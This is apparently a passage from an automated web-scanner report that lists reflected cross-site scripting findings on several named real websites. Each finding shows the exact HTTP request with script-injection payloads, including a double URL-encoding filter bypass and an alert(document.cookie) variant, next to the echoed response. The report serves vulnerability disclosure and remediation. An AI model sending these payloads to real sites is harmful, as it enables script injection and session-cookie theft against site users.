Set-Cookie: mapb=1304017377; expires=Sat, 28-May-2011 19:02:57 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 8010

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Map / Street Map - Spot @ 10 market st, san francisco80eeb\\\" style=x:expression(alert(1)) 3f11a904dd1<
...[SNIP]...
erator to gently embed your own Map/Satellite Map to your homepage. With Map Generator, you just enter your address and copy a small HTML snippet onto you web page. - Spot @ 10 market st, san francisco80eeb\\\" style=x:expression(alert(1)) 3f11a904dd1" />
...[SNIP]...

3.782. http://www.map-generator.net/map.php [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.map-generator.net
Path:	/map.php

Issue detail

The value of the name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0af6"%20style%3dx%3aexpression(alert(1))%203d7a3a57799 was submitted in the name parameter. This input was echoed as b0af6\\\" style=x:expression(alert(1)) 3d7a3a57799 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /map.php?name=Spotb0af6"%20style%3dx%3aexpression(alert(1))%203d7a3a57799&address=10%20market%20st%2C%20san%20francisco&width=500&height=400&maptype=map&zoom=14&t=1303940766 HTTP/1.1
Host: www.map-generator.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: maps=1304017305; mapb=1304017305; __utmz=22393895.1304016692.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=22393895.2116306113.1303939641.1303939641.1304016692.2; __utmc=22393895; __utmb=22393895.12.10.1304016692;

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 19:02:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Set-Cookie: mapb=1304017305; expires=Sun, 01-May-2011 19:02:42 GMT; path=/; domain=.map-generator.net
Set-Cookie: maps=1304017305; expires=Sat, 27-Apr-2013 19:02:42 GMT; path=/; domain=.map-generator.net
Set-Cookie: mapb=1304017362; expires=Sat, 28-May-2011 19:02:42 GMT; path=/; domain=.map-generator.net
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 8415

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Map / Street Map - Spotb0af6\\\" style=x:expression(alert(1)) 3d7a3a57799 @ 10 market st, san francisco<
...[SNIP]...
iption" content="Free Maps Generator to gently embed your own Map/Satellite Map to your homepage. With Map Generator, you just enter your address and copy a small HTML snippet onto you web page. - Spotb0af6\\\" style=x:expression(alert(1)) 3d7a3a57799 @ 10 market st, san francisco" />
...[SNIP]...

3.783. http://www.maxpreps.com/ScriptResource.axd [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxpreps.com
Path:	/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into the HTML document as plain text between tags. The payload 60f44%253cscript%253ealert%25281%2529%253c%252fscript%253e1d9e0243b97 was submitted in the d parameter. This input was echoed as 60f44<script>alert(1)</script>1d9e0243b97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ScriptResource.axd?d=Ehm5I9SOSoVfuWJ9p-RtyvQrHuS1Z_bjDi4wK8c0OXOXrLKaMhncw6FYwMtoYzVVG3_ROwJ_zzfsiRF-oBflJgtI9x_FQyU-UXAaUZ3EZh0160f44%253cscript%253ealert%25281%2529%253c%252fscript%253e1d9e0243b97&t=633525790736573956 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=1745
Date: Thu, 28 Apr 2011 18:50:26 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 26504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<br>http://www.maxpreps.com/ScriptResource.axd?d=Ehm5I9SOSoVfuWJ9p-RtyvQrHuS1Z_bjDi4wK8c0OXOXrLKaMhncw6FYwMtoYzVVG3_ROwJ_zzfsiRF-oBflJgtI9x_FQyU-UXAaUZ3EZh0160f44<script>alert(1)</script>1d9e0243b97&t=633525790736573956<br>
...[SNIP]...

3.784. http://www.maxpreps.com/WebResource.axd [d parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxpreps.com
Path:	/WebResource.axd

Issue detail

The value of the d request parameter is copied into the HTML document as plain text between tags. The payload a1ecd%253cscript%253ealert%25281%2529%253c%252fscript%253ec31afa3ab23 was submitted in the d parameter. This input was echoed as a1ecd<script>alert(1)</script>c31afa3ab23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2a1ecd%253cscript%253ealert%25281%2529%253c%252fscript%253ec31afa3ab23&t=633525117006718750 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Apr 2011 18:50:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 26845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<br>http://www.maxpreps.com/WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2a1ecd<script>alert(1)</script>c31afa3ab23&t=633525117006718750<br>
...[SNIP]...

3.785. http://www.maxpreps.com/WebResource.axd [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxpreps.com
Path:	/WebResource.axd

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 66314%253cx%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%253ebaa560f1323 was submitted in the t parameter. This input was echoed as 66314<x style=x:expr/**/ession(alert(1))>baa560f1323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the t request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=63352511700671875066314%253cx%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%253ebaa560f1323 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4d8cac70fcc&cb=14460
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Thu, 28 Apr 2011 18:50:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 28 Apr 2011 18:50:35 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 26634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<br>http://www.maxpreps.com/WebResource.axd?d=3j-F7gVcFfLOJ9mrf8UaCw2&t=63352511700671875066314<x style=x:expr/**/ession(alert(1))>baa560f1323<br>
...[SNIP]...

3.786. http://www.maxpreps.com/videoview.aspx [videoid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxpreps.com
Path:	/videoview.aspx

Issue detail

The value of the videoid request parameter is copied into the HTML document as plain text between tags. The payload db8a3%253cscript%253ealert%25281%2529%253c%252fscript%253e4d8cac70fcc was submitted in the videoid parameter. This input was echoed as db8a3<script>alert(1)</script>4d8cac70fcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the videoid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3%253cscript%253ealert%25281%2529%253c%252fscript%253e4d8cac70fcc&cb=14460 HTTP/1.1
Host: www.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www-content-v3.maxpreps.com.edgesuite.net/includes/flash/universalvideoplayer/bin/videoplayer.20110412.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mp-ut=ris%3D1; Ad_Manager=session%3Dc%26firstPage%3D0; __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421; XCLGFbrowser=Cg8JIk24ijttAAAASDs; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562&ASK05540_10265

Response

HTTP/1.1 503 Service Unavailable
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Wed, 27 Apr 2011 23:41:01 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:41:01 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 27109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" >

...[SNIP]...
<br>http://www.maxpreps.com/videoview.aspx?videoid=aed2aa1c-c7d4-470d-b99d-97053686306adb8a3<script>alert(1)</script>4d8cac70fcc&cb=14460<br>
...[SNIP]...

3.787. http://www.mysimon.com/ajax/login/submit/ [next parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mysimon.com
Path:	/ajax/login/submit/

Issue detail

The value of the next request parameter is copied into the HTML document as plain text between tags. The payload 569d7<script>alert(1)</script>94c78ca28a9 was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /ajax/login/submit/ HTTP/1.1
Host: www.mysimon.com
Proxy-Connection: keep-alive
Referer: http://www.mysimon.com/
Origin: http://www.mysimon.com
X-Request: JSON
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __utmz=264504851.1303946261.1.1.utmcsr=cbsinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=264504851.1250183867.1303946261.1303946261.1303946261.1; __utmc=264504851; __utmb=264504851.1.10.1303946261; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs
Content-Length: 83

noCache=1303946311836&email=&password=&submit=&next=http%3A%2F%2Fwww.mysimon.com%2F569d7<script>alert(1)</script>94c78ca28a9

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:50 GMT
Server: Apache
Set-Cookie: email=; Domain=.mysimon.com; Path=/
Vary: User-Agent
Content-Type: application/javascript
Content-Length: 320

{"redirect": "http://www.mysimon.com/569d7<script>alert(1)</script>94c78ca28a9", "errors": ["Bad request. Please supply a value for password.", "Bad request. Please supply a value for email or user name for authentication.", "<a href=\"/info/recover-password\">
...[SNIP]...

3.788. http://www.webutation.net/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1ba"><script>alert(1)</script>ac7736f7cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a1ba"><script>alert(1)</script>ac7736f7cd=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
Referer: http://www.map-generator.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:06:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c96cb03916d90d94e30d3c5d89ed0030; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 15443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Webutati
...[SNIP]...
<a href="/?4a1ba"><script>alert(1)</script>ac7736f7cd=1">
...[SNIP]...

3.789. http://www.webutation.net/go/about [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/go/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f3a"><script>alert(1)</script>f37a2a99898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/about?88f3a"><script>alert(1)</script>f37a2a99898=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
Referer: http://www.webutation.net/go/review/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=11594883df80cbaa162a8b035792ceb8; __utmz=69244182.1303941756.1.1.utmcsr=map-generator.net|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=69244182.370615791.1303941756.1303941756.1303941756.1; __utmc=69244182; __utmb=69244182.2.10.1303941756

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Webutati
...[SNIP]...
<a href="/de/about?88f3a"><script>alert(1)</script>f37a2a99898=1">
...[SNIP]...

3.790. http://www.webutation.net/go/contact [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/go/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3bbd"><script>alert(1)</script>83c8de9d3d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/contact?c3bbd"><script>alert(1)</script>83c8de9d3d6=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
Referer: http://www.webutation.net/go/about
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=11594883df80cbaa162a8b035792ceb8; __utmz=69244182.1303941756.1.1.utmcsr=map-generator.net|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=69244182.370615791.1303941756.1303941756.1303941756.1; __utmc=69244182; __utmb=69244182.6.10.1303941756

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Webutati
...[SNIP]...
<a href="/de/contact?c3bbd"><script>alert(1)</script>83c8de9d3d6=1">
...[SNIP]...

3.791. http://www.webutation.net/go/review/facebook.de [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/go/review/facebook.de

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe2b"><script>alert(1)</script>da2abfdec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/review/facebook.de?ffe2b"><script>alert(1)</script>da2abfdec6=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=11594883df80cbaa162a8b035792ceb8; __utmz=69244182.1303941756.1.1.utmcsr=map-generator.net|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=69244182.370615791.1303941756.1303941756.1303941756.1; __utmc=69244182; __utmb=69244182.4.10.1303941756

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 60151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>facebook
...[SNIP]...
<a href="/de/review/facebook.de?ffe2b"><script>alert(1)</script>da2abfdec6=1">
...[SNIP]...

3.792. http://www.webutation.net/go/review/webutation.net [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/go/review/webutation.net

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d0f0"><script>alert(1)</script>fd5a8db8e34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/review/webutation.net?4d0f0"><script>alert(1)</script>fd5a8db8e34=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
Referer: http://www.webutation.net/go/about
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=11594883df80cbaa162a8b035792ceb8; __utmz=69244182.1303941756.1.1.utmcsr=map-generator.net|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=69244182.370615791.1303941756.1303941756.1303941756.1; __utmc=69244182; __utmb=69244182.11.10.1303941756

Response

HTTP/1.1 410 Gone
Date: Wed, 27 Apr 2011 22:19:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 50593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>webutati
...[SNIP]...
<a href="/de/review/webutation.net?4d0f0"><script>alert(1)</script>fd5a8db8e34=1">
...[SNIP]...

3.793. http://www.webutation.net/go/review/xss.cx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.webutation.net
Path:	/go/review/xss.cx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b905"><script>alert(1)</script>e953c895a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/review/xss.cx?9b905"><script>alert(1)</script>e953c895a=1 HTTP/1.1
Host: www.webutation.net
Proxy-Connection: keep-alive
Referer: http://www.webutation.net/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=11594883df80cbaa162a8b035792ceb8; __utmz=69244182.1303941756.1.1.utmcsr=map-generator.net|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=69244182.370615791.1303941756.1303941756.1303941756.1; __utmc=69244182; __utmb=69244182.1.10.1303941756

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:09:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 27819

